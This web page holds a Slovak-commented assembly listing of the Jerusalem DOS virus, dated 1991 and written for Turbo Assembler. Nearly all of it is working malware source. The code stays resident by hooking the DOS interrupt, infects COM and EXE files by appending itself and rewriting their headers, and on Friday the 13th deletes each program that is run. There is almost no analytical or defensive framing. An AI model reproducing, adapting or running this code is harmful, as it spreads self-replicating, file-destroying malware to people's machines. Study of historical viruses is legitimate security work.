Make your own free website on Tripod.com
Prev || Home
; Komentovany vypis virusu JERUZALEM
; Komentar: Vetor   ( 20.6. 1991 )
; urcene pre Turbo Assembler v2.0
first segment
assume cs:first
org 100h
start:
first ends
 
cseg segment
assume cs:cseg,ds:cseg
org   0h
 
jeruzalem proc far
 
    jmp   loc_2				; Skok na zaciatok virusu
	db   'sUMsDos'
w000A	dw   100h
w000C	dw	0CD7h
b000E	db	00
w000F	dw   0000h 
w0011	dw	0034h
pv08	dw	0FEA5h, 0f000h
pv21	dw   1460h, 226h
pv24	dw   556h, 0B6Fh 
eff_cou dw	7A22h
	db   8 dup (0)
w0029	dw	0000h
w002B	label	word
	db	00
w002C	label	word
	db	00
w002D	dw   0FA00h
w002F	dw   8F06h
w0031	dw 	0C52h
w0033	dw	0080h
	db   0, 0, 80h, 0
w0039	dw	0C52h
	db	5Ch, 0
w003D	dw	0C52h
	db	6Ch, 0 
w0041	dw   0C52h
SP_old	dw	00E6h			; Povodny SP register (len pre *.EXE)
SS_old	dw	26F1h			; Povodny SS register (len pre *.EXE)
IP_old	dw   0			; Zalohovany povodny vstupny bod
CS_old	dw	0C62h			;  pre *.EXE program
zal_ff	db   0, 0F0h, 6		; Povodny obsah oblasti 0000:03FCh
is_exe	db	0
;-----------------------------------------------
; Bufer pre nahratie hlavicky exe suboru 
exehdr	db	'MZ'			; Identifikacia *.exe suboru
partpag	dw	00F0h 			; Pocet pouzitych bajtov poslednej stranky
pagecnt	dw   00DCh			; Dlzka suboru v strankach
relcnt	dw	0108h			; Pocet relokacnych poloziek
hdrsize	dw	0060h			; Dlzka hlavicky v paragrafoch
minmem	dw	0000h			; Min. pozadovana pamat za koncom prg.
maxmem	dw   0FFFFh			; Max. pozadovana pamat za koncom prg.
reloSS	dw	1A9Eh 			; Relativny SS v case spustenia
reloSP	dw	710h			; Hodnota SP v case spustenia
chksum	dw	1984h			; Kontrolny sucet
reloIP	dw	00C5h			; Hodnota IP v case spustenia
reloCS	dw	1A9Eh			; Relativny CS v case spustenia
tabloff dw	0022h			; Offset zaciatku relokacnej tabulky 
overlay	dw	0000h			; Cislo prekrytia (modulu)
;-----------------------------------------------
	db   30h, 30h, 35h, 0Dh, 0Ah
handle	dw   0005			; Popisovac aktualne suboru
atrib	dw	0020h			; Zalohovany atribut suboru
date	dw	0021h			; Zalohovany datum suboru
time	dw   0012h			; Zalohovany cas suboru
c0200	dw	0200h
c0010	dw	0010h
lengt	dw   0AFE0h, 0001h		; Dlzka suboru
fname	dw	41B9h, 9B2Ah		; Smernik na meno spustaneho suboru
	db   'COMMAND.COM'
w008F	dw   0001
	db	0, 0, 0, 0
loc_2:	cld			   
	mov   ah,0E0h				; Si uz zavedeny v pamati ?
	int   21h		   		
	cmp   ah,0E0h
	jae   loc_3		  		; Nie => chod sa zaviest
	cmp   ah,3				; Ano => zisti verziu
	jb   loc_3		  
	mov   ah,0DDh
	mov   di,100h
	mov   si,710h
	add   si,di
	db	2Eh, 8Bh, 8Dh, 11h, 0 		; Tieto bajty generuju nasledujucu instr.
    ;mov   cx,cs:[di+0011h]
	int   21h		   
loc_3:	mov   ax,cs
	add   ax,10h
	mov   ss,ax
	mov   sp,700h
	push  ax
	mov   ax,0C5h
	push  ax
	ret			   
	cld
	push 	es
	mov 	cs:[w0031],es  
	mov 	cs:[w0039],es  
	mov 	cs:[w003D],es
	mov 	cs:[w0041],es	 
	mov 	ax,es
	add	ax,0010h
	add	cs:[CS_old],ax	
	add	cs:[SS_old],ax 
	mov	ah,0E0h
	int	21h
	cmp	ah,0E0h
	jnc	lll_1
	cmp	ah,03
	pop	es
	mov 	ss,cs:[SS_old]
	mov	sp,cs:[SP_old]
	jmp 	dword ptr cs:[IP_old]
lll_1:	xor	ax,ax
	mov	es,ax
	mov	ax,es:[03FCh]
	mov	word ptr cs:[zal_ff],ax 	
	mov	al,es:[03FEh]
	mov	cs:[zal_ff+2],al  
	mov   es:[03FCh],0A5F3h
	mov   byte ptr es:[03FEh],0CBh
	pop   ax
	add   ax,10h
	mov   es,ax
	push  cs
	pop   ds
	mov   cx,710h
	shr   cx,1		  
	xor   si,si		  
	mov   di,si
	push  es
	mov   ax,offset lll_2
	push  ax
	jmp   far ptr x_low
lll_2:	mov 	ax,cs
	mov	ss,ax
	mov	sp,700h
	xor	ax,ax
	mov 	ds,ax
	mov 	ax,word ptr cs:[zal_ff]
	mov	ds:[03FCh],ax
	mov	al,cs:[zal_ff+2]
	mov	ds:[03FEh],al	
	mov   bx,sp
	mov   cl,4
	shr   bx,cl		  
	add   bx,10h
	mov   cs:[w0033],bx
	mov   ah,4Ah		 
	mov   es,cs:[w0031]  
	int   21h		; change mem allocation, bx=siz
	mov   ax,3521h
	int   21h		   
	mov   cs:[pv21+0],bx
	mov   cs:[pv21+2],es
	push  cs
	pop   ds
	mov   dx,25Bh
	mov   ax,2521h
	int   21h	   
	mov   es,ds:[w0031] 
	mov   es,es:[w002C] 
	xor   di,di	 
	mov   cx,7FFFh
	xor   al,al	 
locloop_4:
	repnz  scasb		 
	cmp   es:[di],al
	loopnz locloop_4		   
 	mov   dx,di
	add   dx,3
	mov   ax,4B00h
	push  es
	pop   ds
	push  cs
	pop   es
	mov   bx,35h
	push  ds
	push  es
	push  ax
	push  bx
	push  cx
	push  dx
	mov   ah,2Ah	
	int   21h		; get date, cx=year, dx=mon/day
	mov   cs:[b000E],0
	cmp   cx,7C3h
	je   loc_6		  
	cmp   al,5
	jne   loc_5		  
	cmp   dl,0Dh
	jne   loc_5		  
	inc   cs:[b000E]
	jmp   short loc_6
	nop 
loc_5:	mov   ax,3508h
	int   21h		  
	mov   cs:[pv08],bx
	mov   cs:[pv08+2],es
	push  cs
	pop   ds
	mov   ds:[eff_cou],7E90h 
	mov   ax,2508h
	mov   dx,21Eh
	int   21h	
loc_6:	pop   dx
	pop   cx
	pop   bx
	pop   ax
	pop   es
	pop   ds
	pushf		
	call  dword ptr cs:[pv21]
	push  ds
	pop   es
	mov   ah,49h	
	int   21h		; release memory block, es=seg
	mov   ah,4Dh	
	int   21h	; get return code info in ax
	mov   ah,31h	
	mov   dx,600h
	mov   cl,4
	shr   dx,cl	
	add   dx,10h
	int   21h	; terminate & stay resident
	db   32h, 0C0h, 0CFh, 2Eh, 83h, 3Eh
	db   1Fh, 0, 2, 75h, 17h, 50h
	db   53h, 51h, 52h, 55h, 0B8h, 2
	db   6, 0B7h, 87h, 0B9h, 5, 5
	db   0BAh, 10h, 10h, 0CDh, 10h, 5Dh
	db   5Ah, 59h, 5Bh, 58h, 2Eh, 0FFh
	db   0Eh, 1Fh, 0, 75h, 12h, 2Eh
	db   0C7h, 6, 1Fh, 0, 1, 0
	db   50h, 51h, 56h, 0B9h, 1, 40h
	db   0F3h, 0ACh, 5Eh, 59h, 58h, 2Eh
	db   0FFh, 2Eh, 13h, 0, 9Ch, 80h
	db   0FCh, 0E0h, 75h, 5, 0B8h, 0
	db   3, 9Dh, 0CFh, 80h, 0FCh, 0DDh
	db   74h, 13h, 80h, 0FCh, 0DEh, 74h
	db   28h, 3Dh, 0, 4Bh, 75h, 3
	db   0E9h, 0B4h, 0
loc_7:	popf			  
	jmp   dword ptr cs:[pv21]
loc_8:	pop   ax
	pop   ax
	mov   ax,100h
	mov   cs:[w000A],ax
	pop   ax
	mov   cs:[w000C],ax
	rep   movsb	
	popf		
	mov   ax,cs:[w000F]
	jmp   dword ptr cs:[w000A]
loc_9:	add   sp,6
	popf		
	mov   ax,cs
	mov   ss,ax
	mov   sp,710h
	push  es
	push  es
	xor   di,di	
	push  cs
	pop   es
	mov   cx,10h
	mov   si,bx
	mov   di,21h
	rep   movsb	
	mov   ax,ds
	mov   es,ax
	mul   cs:[c0010]
	add   ax,cs:[w002B]
	adc   dx,0
	div   cs:[c0010]
	mov   ds,ax
	mov   si,dx
	mov   di,dx
	mov   bp,es
	mov   bx,cs:[w002F]
	or   bx,bx	
	jz   loc_11	
loc_10:	mov   cx,8000h
	rep   movsw	
	add   ax,1000h
	add   bp,1000h
	mov   ds,ax
	mov   es,bp
	dec   bx
	jnz   loc_10	
loc_11:	mov   cx,cs:[w002D]
	rep   movsb	
	pop   ax
	push  ax
	add   ax,10h
	add   cs:[w0029],ax
data_50	db   2Eh
	db   1, 6, 25h, 0, 2Eh, 0A1h
	db   21h, 0, 1Fh, 7, 2Eh, 8Eh
	db   16h, 29h, 0, 2Eh, 8Bh, 26h
	db   27h, 0, 2Eh, 0FFh, 2Eh, 23h
	db   0
loc_12:	xor   cx,cx	
	mov   ax,4301h
	int   21h	; get/set file attrb, nam@ds:dx
	mov   ah,41h	
	int   21h	; delete file, name @ ds:dx
	mov   ax,4B00h
	popf		
	jmp   dword ptr cs:[pv21]
loc_13:	cmp   cs:[b000E],1
	je   loc_12		 
	mov   cs:[handle],0FFFFh
	mov   cs:[w008F],0
	mov   cs:[fname+0],dx
	mov   cs:[fname+2],ds
	push  ax
	push  bx
	push  cx
	push  dx
	push  si
	push  di
	push  ds
	push  es
	cld			  
	mov   di,dx
	xor   dl,dl		  
	cmp   byte ptr [di+1],3Ah
	jne   loc_14	
	mov   dl,[di]
	and   dl,1Fh
loc_14:	mov   ah,36h	
	int   21h		; get free space, drive dl,1=a:
	cmp   ax,0FFFFh
	jne   loc_16
loc_15:	jmp   loc_42
loc_16:	mul   bx	
	mul   cx	
	or   dx,dx	
	jnz   loc_17	
	cmp   ax,710h
	jb   loc_15	
loc_17:	mov   dx,cs:[fname]
	push  ds
	pop   es
	xor   al,al		
	mov   cx,41h
	repnz  scasb		 
	mov   si,cs:[fname]
loc_18:	mov   al,[si]
	or   al,al		 
	jz   loc_20		 
	cmp   al,61h		 ; 'a'
	jb   loc_19		 
	cmp   al,7Ah		 ; 'z'
	ja   loc_19		 
	sub   byte ptr [si],20h
loc_19:	inc   si
	jmp   short loc_18
loc_20:	mov   cx,0Bh
	sub   si,cx
	mov   di,84h
	push  cs
	pop   es
	mov   cx,0Bh
	rep	cmpsb		
	jnz   loc_21		
	jmp   loc_42
loc_21:	mov   ax,4300h
	int   21h		; get/set file attrb, nam@ds:dx
	jc   loc_22		
	mov   cs:[atrib],cx
loc_22:	jc   loc_24		
	xor   al,al		
	mov   cs:[is_exe],al
	push  ds
	pop   es
	mov   di,dx
	mov   cx,41h
	repnz  scasb		
	cmp   byte ptr [di-2],4Dh	   ; 'M'
	je   loc_23	
	cmp   byte ptr [di-2],6Dh	   ; 'm'
	je   loc_23	
	inc   cs:[is_exe]
loc_23:	mov   ax,3D00h
	int   21h		; open file, al=mode,name@ds:dx
loc_24:	jc   loc_26	
	mov   cs:[handle],ax
	mov   bx,ax
	mov   ax,4202h
	mov   cx,0FFFFh
	mov   dx,0FFFBh
	int   21h		; move file ptr, cx,dx=offset
	jc   loc_24	
	add   ax,5
	mov   cs:[w0011],ax
	mov   cx,5
	mov   dx,6Bh
	mov   ax,cs
	mov   ds,ax
	mov   es,ax
	mov   ah,3Fh	
	int   21h		; read file, cx=bytes, to ds:dx
	mov   di,dx
	mov   si,5
	rep   cmpsb		 
	jnz   loc_25	
	mov   ah,3Eh	
	int   21h		; close file, bx=file handle
	jmp   loc_42
loc_25:	mov   ax,3524h
	int   21h	
	mov   ds:[pv24+0],bx
	mov   ds:[pv24+2],es
	mov   dx,21Bh
	mov   ax,2524h
	int   21h				
	lds   dx,dword ptr ds:[fname]
	xor   cx,cx	
	mov   ax,4301h
	int   21h	 ;get/set file attrb, nam@ds:dx
loc_26:	jc   loc_27		 
	mov   bx,cs:[handle]
	mov   ah,3Eh		 
	int   21h		 ; close file, bx=file handle
	mov   cs:[handle],0FFFFh
	mov   ax,3D02h
	int   21h		 ; open file, al=mode,name@ds:dx
	jc   loc_27	
	mov   cs:[handle],ax
	mov   ax,cs
	mov   ds,ax
	mov   es,ax
	mov   bx,ds:[handle]
	mov   ax,5700h
	int   21h		; get/set file date & time
	mov   ds:[date],dx
	mov   ds:[time],cx
	mov   ax,4200h
	xor   cx,cx	
	mov   dx,cx
	int   21h		; move file ptr, cx,dx=offset
loc_27:	jc   loc_30	
	cmp   ds:[is_exe],0
	je   loc_28	
	jmp   short loc_32
	db   90h
loc_28:	mov   bx,1000h
	mov   ah,48h	
	int   21h		; allocate memory, bx=bytes/16
	jnc   loc_29	
	mov   ah,3Eh	
	mov   bx,ds:[handle]
	int   21h		; close file, bx=file handle
	jmp   loc_42
loc_29:	inc   ds:[w008F]
	mov   es,ax
	xor   si,si		 
	mov   di,si
	mov   cx,710h
	rep   movsb		 
	mov   dx,di
	mov   cx,ds:[w0011]
	mov   bx,ds:[handle]
	push  es
	pop   ds
	mov   ah,3Fh		 
	int   21h		 ; read file, cx=bytes, to ds:dx
loc_30:	jc   loc_31		 
	add   di,cx
	xor   cx,cx		  
	mov   dx,cx
	mov   ax,4200h
	int   21h		   ; move file ptr, cx,dx=offset
	mov   si,5
	mov   cx,5
	db   0F3h, 2Eh, 0A4h, 8Bh, 0CFh, 33h
	db   0D2h, 0B4h, 40h, 0CDh
	db   21h
loc_31:	jc   loc_33
	jmp   loc_40
loc_32:	mov   cx,1Ch
	mov   dx,4Fh
	mov   ah,3Fh	
	int   21h	  	; read file, cx=bytes, to ds:dx
loc_33:	jc   loc_35		
	mov   ds:[chksum],1984h
	mov   ax,ds:[reloSS]
	mov   ds:[SS_old],ax
	mov   ax,ds:[reloSP]
	mov   ds:[SP_old],ax
	mov   ax,ds:[reloIP]
	mov   ds:[IP_old],ax
	mov   ax,ds:[reloCS]
	mov   ds:[CS_old],ax
	mov   ax,ds:[pagecnt]
	cmp   ds:[partpag],0
	je   loc_34	
	dec   ax
loc_34:	mul   ds:[c0200]	 
	add   ax,ds:[partpag]
	adc   dx,0
	add   ax,0Fh
	adc   dx,0
	and   ax,0FFF0h
	mov   ds:[lengt+0],ax
	mov   ds:[lengt+2],dx
	add   ax,710h
	adc   dx,0
loc_35:	jc   loc_37	
	div   ds:[c0200]
	or   dx,dx	
	jz   loc_36		 
	inc   ax
loc_36:	mov   ds:[pagecnt],ax
	mov   ds:[partpag],dx
	mov   ax,ds:[lengt+0]
	mov   dx,ds:[lengt+2]
	div   ds:[c0010]
	sub   ax,ds:[hdrsize]
	mov   ds:[reloCS],ax
	mov   ds:[reloIP],0C5h
	mov   ds:[reloSS],ax
	mov   ds:[reloSP],710h
	xor   cx,cx		 
	mov   dx,cx
	mov   ax,4200h
	int   21h		 ; move file ptr, cx,dx=offset
loc_37:	jc   loc_38		 
	mov   cx,1Ch
	mov   dx,4Fh
	mov   ah,40h		 
	int   21h		  ; write file cx=bytes, to ds:dx
loc_38:	jc   loc_39		 
	cmp   ax,cx
	jne   loc_40		 
	mov   dx,ds:[lengt+0]
	mov   cx,ds:[lengt+2]
	mov   ax,4200h
	int   21h		 ; move file ptr, cx,dx=offset
loc_39:	jc   loc_40		 
	xor   dx,dx		 
	mov   cx,710h
	mov   ah,40h		 
	int   21h		  ; write file cx=bytes, to ds:dx
loc_40:	cmp   cs:[w008F],0
	je   loc_41	
	mov   ah,49h	
	int   21h		; release memory block, es=seg
loc_41:	cmp   cs:[handle],0FFFFh
	je   loc_42	
	mov   bx,cs:[handle]
	mov   dx,cs:[date]
	mov   cx,cs:[time]
	mov   ax,5701h
	int   21h		; get/set file date & time
	mov   ah,3Eh	
	int   21h		; close file, bx=file handle
	lds   dx,dword ptr cs:[fname]
	mov   cx,cs:[atrib]
	mov   ax,4301h
	int   21h		; get/set file attrb, nam@ds:dx
	lds   dx,dword ptr cs:[pv24]
	mov   ax,2524h
	int   21h		; set intrpt vector al to ds:dx
loc_42: pop   es
	pop   ds
	pop   di
	pop   si
	pop   dx
	pop   cx
	pop   bx
	pop   ax
	popf		
	jmp   dword ptr cs:[pv21]
	db   11 dup (0)
	db   4Dh, 6Fh, 0Bh, 0, 10h, 0
	db   10 dup (0)
	db   0E9h, 92h, 0, 73h, 55h, 4Dh
	db   73h, 44h, 6Fh, 73h, 0, 1
	db   0D7h, 0Ch, 0, 0, 0, 34h
	db   0, 0A5h, 0FEh, 0, 0F0h, 60h
	db   14h, 26h, 2, 56h, 5, 6Fh
	db   0Bh, 22h, 7Ah, 0
	db   12 dup (0)
	db   0FAh, 6, 8Fh, 52h, 0Ch, 80h
	db   0, 0, 0, 80h, 0, 52h
	db   0Ch, 5Ch, 0, 52h, 0Ch, 6Ch
	db   0, 52h, 0Ch, 0E6h, 0, 0F1h
	db   26h, 0, 0, 62h, 0Ch, 0
	db   0F0h, 6, 0, 4Dh, 5Ah, 0F0h
	db   0, 0DCh, 0, 8, 1, 60h
	db   0, 0, 0, 0FFh, 0FFh, 9Eh
	db   1Ah, 10h, 7, 84h, 19h, 0C5h
	db   0, 9Eh, 1Ah, 22h, 0, 0
	db   0, 30h, 30h, 35h, 0Dh, 0Ah
	db   5, 0, 20h, 0, 21h, 0
	db   12h, 0, 0, 2, 10h, 0
	db   0E0h, 0AFh, 1, 0, 0B9h, 41h
	db   2Ah, 9Bh
	db   'COMMAND.COM'
	db   1, 0, 0, 0, 0, 0
	db   0FCh, 0B4h, 0E0h, 0CDh, 21h, 80h
	db   0FCh, 0E0h, 73h, 16h, 80h, 0FCh
	db   3, 72h, 11h, 0B4h, 0DDh, 0BFh
	db   0, 1, 0BEh, 10h, 7, 3
	db   0F7h, 2Eh, 8Bh, 8Dh, 11h, 0
	db   0CDh
	db   21h
loc_43:	mov   ax,cs
	add   ax,10h
	mov   ss,ax
	mov   sp,700h
	push  ax
	mov   ax,0C5h
	push  ax
	ret			   ; Return far
 
	db   0FCh, 6, 2Eh, 8Ch, 6, 31h
	db   0, 2Eh, 8Ch, 6, 39h, 0
	db   2Eh, 8Ch, 6, 3Dh, 0, 2Eh
	db   8Ch, 6, 41h, 0, 8Ch, 0C0h
	db   5, 10h, 0, 2Eh, 1, 6
	db   49h, 0, 2Eh, 1, 6, 45h
	db   0, 0B4h, 0E0h, 0CDh, 21h, 80h
	db   0FCh, 0E0h, 73h, 13h, 80h, 0FCh
	db   3, 7, 2Eh, 8Eh, 16h, 45h
	db   0, 2Eh, 8Bh, 26h, 43h, 0CDh
	db   ' 000000010'
	db   8 dup (30h)
	db   32h, 30h
	db   8 dup (30h)
	db   33h, 30h
	db   8 dup (30h)
	db   34h, 30h
	db   8 dup (30h)
	db   '5', 0Dh, 0Ah, 'MsDos' 
jeruzalem endp 
cseg ends
ram_low segment at 0000
assume cs:ram_low
org 3FCh
x_low proc far
	rep movsw
	ret
x_low endp
ram_low ends
end start
-----------------------------------------------------------------------------